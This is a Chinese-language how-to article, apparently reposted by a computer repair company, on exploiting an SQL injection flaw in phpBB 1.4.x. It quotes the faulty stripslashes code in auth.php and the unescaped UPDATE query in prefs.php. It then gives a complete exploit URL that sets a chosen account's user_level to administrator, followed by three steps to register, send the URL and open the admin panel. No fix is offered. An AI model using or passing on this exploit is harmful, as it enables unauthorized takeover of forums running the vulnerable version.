利用phpBB1.4.0漏洞取得系统管理员权限

  phpBB 是一个开放源码的电子通告牌系统。但是发现它的 phpBB 1.4.X 版本在对变量输出的验证上存在问题。
  这大概导致对受影响系统的恣意 sql 请求被通过。
  问题在于 phpBB 1.4.X 的 auth.php 文件中有一个运算规则，它会移去 PHP 自动加到 GPC 变量(Get/post/Cookie)的反斜线。
 
  if(get_magic_quotes_gpc() == 1)
  {
  switch($REQUEST_METHOD){
  case "POST":
  while (list ($key, $val) = each
  ($HTTP_POST_VARS)){
  if( is_array($val) ){
  array_walk($val, 'stripslashes_array', '');
  $$key = $val;}
  else{
  $$key = stripslashes($val);}
  }
  break;
 
  因而，某些通过 URL 提交的 PHP 变量大概达到一个带 unescaped quotes 的 sql 请求。在 prefs.php 文件中，攻击者通过给$viewemail 提供某一类型的值大概实行恣意请求。
  < Example sql query in prefs.php >
  $sql = "UPDATE users SET
  user_viewemail='$viewemail',
  user_theme='$themes', user_attachsig = '$sig',
  user_desmile = '$smile', user_html = '$dishtml',
  user_bbcode
  = '$disbbcode', user_lang = '$lang' WHERE
  (user_id = '$userdata[user_id]')";
 
 
  http://sitename/phpBBfolder/prefs.php?save=1
  &viewemail=1',user_level%3D'4'%20where%
  20username%3D'l337h4x0r'%23
 
  这个例子 URL 将会产生一个带 level 4 (administrative) 特权的用户 "l337h4x0r"
  总结过程如下：
  1、在 phpBB 上注册一个帐户
  2、键入下面的 URL
  3、在 "Administration Panel" 上点击。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：